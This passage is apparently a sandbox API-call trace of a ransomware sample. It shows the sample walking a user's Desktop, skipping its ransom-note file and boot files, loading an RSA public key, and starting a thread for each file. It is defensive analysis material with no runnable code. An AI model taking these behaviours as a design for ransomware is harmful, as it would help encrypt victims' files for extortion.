MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.227] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FNPUDpYy3rwMi.flv" | out: lpString1="FNPUDpYy3rwMi.flv") returned="FNPUDpYy3rwMi.flv" [0164.227] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.228] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0164.228] Sleep (dwMilliseconds=0x96) [0164.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0164.442] lstrcmpW (lpString1="FzoKie.rtf", lpString2="..") returned 1 [0164.442] lstrcmpW (lpString1="FzoKie.rtf", lpString2=".") returned 1 [0164.442] StrStrW (lpFirst="FzoKie.rtf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0164.442] StrStrW (lpFirst="FzoKie.rtf", lpSrch="ntldr") returned 0x0 [0164.442] StrStrW (lpFirst="FzoKie.rtf", lpSrch="NTLDR") returned 0x0 [0164.442] StrStrW (lpFirst="FzoKie.rtf", lpSrch="NTDETECT.COM") returned 0x0 [0164.442] StrStrW (lpFirst="FzoKie.rtf", lpSrch="ntdetect.com") returned 0x0 [0164.442] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0164.442] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0164.442] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.442] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FzoKie.rtf" | out: lpString1="FzoKie.rtf") returned="FzoKie.rtf" [0164.442] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0164.443] Sleep (dwMilliseconds=0x96) [0164.586] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0164.586] lstrcmpW (lpString1="jkGAH7YstwIc6lZC9j.gif", lpString2="..") returned 1 [0164.586] lstrcmpW (lpString1="jkGAH7YstwIc6lZC9j.gif", lpString2=".") returned 1 [0164.586] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0164.586] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="ntldr") returned 0x0 [0164.586] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="NTLDR") returned 0x0 [0164.586] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="NTDETECT.COM") returned 0x0 [0164.586] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="ntdetect.com") returned 0x0 [0164.586] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0164.586] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0164.586] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.586] lstrcpyW (in: lpString1=0x17cf1c, lpString2="jkGAH7YstwIc6lZC9j.gif" | out: lpString1="jkGAH7YstwIc6lZC9j.gif") returned="jkGAH7YstwIc6lZC9j.gif" [0164.586] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b4 [0164.586] Sleep (dwMilliseconds=0x96) [0164.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0164.819] lstrcmpW (lpString1="JYsb.gif", lpString2="..") returned 1 [0164.819] lstrcmpW (lpString1="JYsb.gif", lpString2=".") returned 1 [0164.819] StrStrW (lpFirst="JYsb.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0164.819] StrStrW (lpFirst="JYsb.gif", lpSrch="ntldr") returned 0x0 [0164.819] StrStrW (lpFirst="JYsb.gif", lpSrch="NTLDR") returned 0x0 [0164.819] StrStrW (lpFirst="JYsb.gif", lpSrch="NTDETECT.COM") returned 0x0 [0164.819] StrStrW (lpFirst="JYsb.gif", lpSrch="ntdetect.com") returned 0x0 [0164.819] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0164.820] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0164.820] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.820] lstrcpyW (in: lpString1=0x17cf1c, lpString2="JYsb.gif" | out: lpString1="JYsb.gif") returned="JYsb.gif" [0164.820] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0164.820] Sleep (dwMilliseconds=0x96) [0165.120] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0165.120] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0165.120] lstrcmpW (lpString1="Lj26CzXci-whK31.wav", lpString2="..") returned 1 [0165.120] lstrcmpW (lpString1="Lj26CzXci-whK31.wav", lpString2=".") returned 1 [0165.120] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0165.120] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="ntldr") returned 0x0 [0165.120] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="NTLDR") returned 0x0 [0165.120] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="NTDETECT.COM") returned 0x0 [0165.121] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="ntdetect.com") returned 0x0 [0165.121] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0165.121] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0165.121] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.121] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Lj26CzXci-whK31.wav" | out: lpString1="Lj26CzXci-whK31.wav") returned="Lj26CzXci-whK31.wav" [0165.121] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x964 [0165.121] Sleep (dwMilliseconds=0x96) [0165.340] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0165.340] lstrcmpW (lpString1="NvEcGQE86DZ.flv", lpString2="..") returned 1 [0165.340] lstrcmpW (lpString1="NvEcGQE86DZ.flv", lpString2=".") returned 1 [0165.340] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0165.340] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="ntldr") returned 0x0 [0165.340] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="NTLDR") returned 0x0 [0165.340] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="NTDETECT.COM") returned 0x0 [0165.340] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="ntdetect.com") returned 0x0 [0165.340] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0165.340] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0165.341] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.341] lstrcpyW (in: lpString1=0x17cf1c, lpString2="NvEcGQE86DZ.flv" | out: lpString1="NvEcGQE86DZ.flv") returned="NvEcGQE86DZ.flv" [0165.341] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x22c [0165.341] Sleep (dwMilliseconds=0x96) [0165.538] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0165.538] lstrcmpW (lpString1="oNjA8Krckm-Uh1s9B5p.mkv", lpString2="..") returned 1 [0165.538] lstrcmpW (lpString1="oNjA8Krckm-Uh1s9B5p.mkv", lpString2=".") returned 1 [0165.538] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0165.538] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="ntldr") returned 0x0 [0165.538] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="NTLDR") returned 0x0 [0165.538] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0165.538] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="ntdetect.com") returned 0x0 [0165.538] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0165.538] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0165.538] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.538] lstrcpyW (in: lpString1=0x17cf1c, lpString2="oNjA8Krckm-Uh1s9B5p.mkv" | out: lpString1="oNjA8Krckm-Uh1s9B5p.mkv") returned="oNjA8Krckm-Uh1s9B5p.mkv" [0165.538] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x970 [0165.538] Sleep (dwMilliseconds=0x96) [0165.755] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0165.755] lstrcmpW (lpString1="oVGbbCOCJnt_S.bmp", lpString2="..") returned 1 [0165.755] lstrcmpW (lpString1="oVGbbCOCJnt_S.bmp", lpString2=".") returned 1 [0165.755] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0165.755] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="ntldr") returned 0x0 [0165.755] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="NTLDR") returned 0x0 [0165.755] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0165.755] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="ntdetect.com") returned 0x0 [0165.756] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0165.756] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0165.756] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.756] lstrcpyW (in: lpString1=0x17cf1c, lpString2="oVGbbCOCJnt_S.bmp" | out: lpString1="oVGbbCOCJnt_S.bmp") returned="oVGbbCOCJnt_S.bmp" [0165.756] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x96c [0165.756] Sleep (dwMilliseconds=0x96) [0165.944] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0165.944] lstrcmpW (lpString1="P2Yd7s y0s0iE3pixbWf.mp4", lpString2="..") returned 1 [0165.944] lstrcmpW (lpString1="P2Yd7s y0s0iE3pixbWf.mp4", lpString2=".") returned 1 [0165.944] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0165.944] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="ntldr") returned 0x0 [0165.944] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="NTLDR") returned 0x0 [0165.944] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0165.944] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="ntdetect.com") returned 0x0 [0165.944] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0165.944] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0165.944] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.944] lstrcpyW (in: lpString1=0x17cf1c, lpString2="P2Yd7s y0s0iE3pixbWf.mp4" | out: lpString1="P2Yd7s y0s0iE3pixbWf.mp4") returned="P2Yd7s 